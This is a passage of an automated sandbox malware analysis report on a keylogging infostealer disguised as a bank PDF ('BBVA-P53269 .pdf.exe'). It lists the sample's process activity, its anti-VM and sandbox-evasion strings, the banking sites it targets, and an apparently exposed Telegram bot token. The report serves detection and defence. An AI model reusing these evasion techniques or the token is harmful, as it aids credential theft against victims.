            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: BBVA-P53269 .pdf.exe PID: 7844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AllData.exe PID: 7936, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.0000000003165000.00000004.00000800.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1448506731.00000000024F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeMemory allocated: 1710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeMemory allocated: 1710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeMemory allocated: 720000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeMemory allocated: 24B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeMemory allocated: AA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: foregroundWindowGot 1625Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: foregroundWindowGot 1774Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
            Source: WebData.6.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: WebData.6.drBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: WebData.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: WebData.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: WebData.6.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: WebData.6.drBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: WebData.6.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW4
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000008.00000002.1413381882.0000015999414000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: WebData.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: wscript.exe, 00000008.00000002.1413381882.0000015999414000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5d-
            Source: WebData.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: AllData.exe, 00000009.00000002.1448506731.00000000024F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
            Source: WebData.6.drBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: WebData.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314117067.000000000143A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
            Source: WebData.6.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: WebData.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: WebData.6.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: AllData.exe, 00000009.00000002.1447011143.0000000000782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: WebData.6.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: WebData.6.drBinary or memory string: outlook.office.comVMware20,11696501413s
            Source: WebData.6.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: WebData.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: WebData.6.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: WebData.6.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: AllData.exe, 00000009.00000002.1448506731.00000000024F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
            Source: WebData.6.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: WebData.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: WebData.6.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: WebData.6.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: WebData.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: WebData.6.drBinary or memory string: global block list test formVMware20,11696501413
            Source: WebData.6.drBinary or memory string: outlook.office365.comVMware20,11696501413t
            Source: WebData.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: WebData.6.drBinary or memory string: interactiveuserers.comVMware20,11696501413
            Source: WebData.6.drBinary or memory string: discord.comVMware20,11696501413f
            Source: WebData.6.drBinary or memory string: AMC password management pageVMware20,11696501413
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\AllData.exe "C:\Users\user\AppData\Roaming\AllData.exe" Jump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:18]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751022610.0000000003906000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:58]<<Program Manager
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:29]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:40]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerROxtmLu<L3.S
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3750951382.0000000003900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:07]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:41]<<Program ManagerHa(b,c,!0)));return a}}function Ha(a,b,c){var d=c||b&2?K:xa,e=!!(b&32);a=Ba(a,b,function(f){return Ga(f,e,d)});G(a,32|(c?2:0));return a};function Ia(a,b){a=a.h;return Ja(a,J(a),b)}function Ja(a,b,c,d){if(-1===c)return null;if(c>=L(b)){if(b&256)return a[a.length-1][c]}else{var e=a.length;if(d&&b&256&&(d=a[e-1][c],null!=d))return d;b=c+((b>>9&1)-1);if(b<e)return a[b]}}function Ka(a,b,c,d,e){var f=L(b);if(c>=f||e){e=b;if(b&256)f=a[a.length-1];else{if(null==d)return;f=a[f+((b>>9&1)-1)]={};e|=256}f[c]=d;e&=-1025;e!==b&&I(a,e)}else a[c+((b>>9&1)-1)]=d,b&256&&(d=a[a.length-1],c in d&&delete d[c]),b&1024&&I(a,b&-1025)}
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: J2:25:28]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:30]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :58]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:41]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managere1?
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :28:58]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8:07]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:36]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:28:58]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -KL:::user-PC\user\8.46.123.189jHBiuDlP6]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749799651.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:58]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagertxtmLun/oc{
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :27:17]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:59]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:45]<<Program Manager>>K
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:08]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:17]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:13]<<Program Manager>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :28:49]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 22]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:01]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750531516.0000000003D7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:26:18]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:39]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:57]<<Program Manager
            Source: KeyDataToUwXAnH.txt.6.drBinary or memory string: [02:25:50]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:38]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, KeyDataToUwXAnH.txt.6.drBinary or memory string: [02:25:51]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:16]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:26:30]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:46]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgoProgram Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:20]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--4f5-b1ed-4060-99b9-fca7ff59c113--32]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :28:57]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2:28:04]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3]<<Program Manager>>
            Source: KeyDatayMRUSbUX.txt.6.drBinary or memory string: [02:25:42]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BDC-KL:::user-PC\user\8.46.123.189jHBiuDlP1]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3751584905.0000000003F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:32]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:33]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3750851773.0000000003DDF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:28:44]<<Program Manager>>
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [02:25:21]<<Program Manager>>
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
